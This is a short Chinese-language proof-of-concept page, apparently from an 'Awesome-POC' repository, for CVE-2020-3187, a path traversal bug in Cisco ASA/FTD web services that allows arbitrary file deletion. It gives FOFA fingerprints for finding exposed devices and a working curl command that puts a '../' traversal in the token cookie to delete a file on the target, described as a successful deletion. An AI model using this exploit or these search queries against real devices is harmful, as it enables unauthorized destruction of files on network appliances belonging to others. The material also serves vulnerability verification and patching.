Awesome-POC/network-device/Cisco ASA设备任意文件删除漏洞 CVE-2020-3187.md
2022-02-20 16:14:31 +08:00

54 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Cisco ASA设备任意文件删除漏洞 CVE-2020-3187
## 漏洞描述
Cisco ASA Software和FTD Software中的Web服务接口存在路径遍历漏洞该漏洞源于程序没有对HTTP URL进行正确的输入验证。远程攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。
## 漏洞影响
- Cisco ASA设备
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162118289.png)
- Cisco FTD设备
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162119368.png)
## FOFA
```
/+CSCOE+/
Cisco-ASA
```
## 漏洞复现
访问 http://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html 存在则可能出现此漏洞
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162119941.png)
例如我们删除一张图片 http://xxx.xxx.xxx.xxx/+CSCOU+/csco_logo.gif
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162119367.png)
使用 curl 发送请求
```shell
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162119779.png)
成功删除图标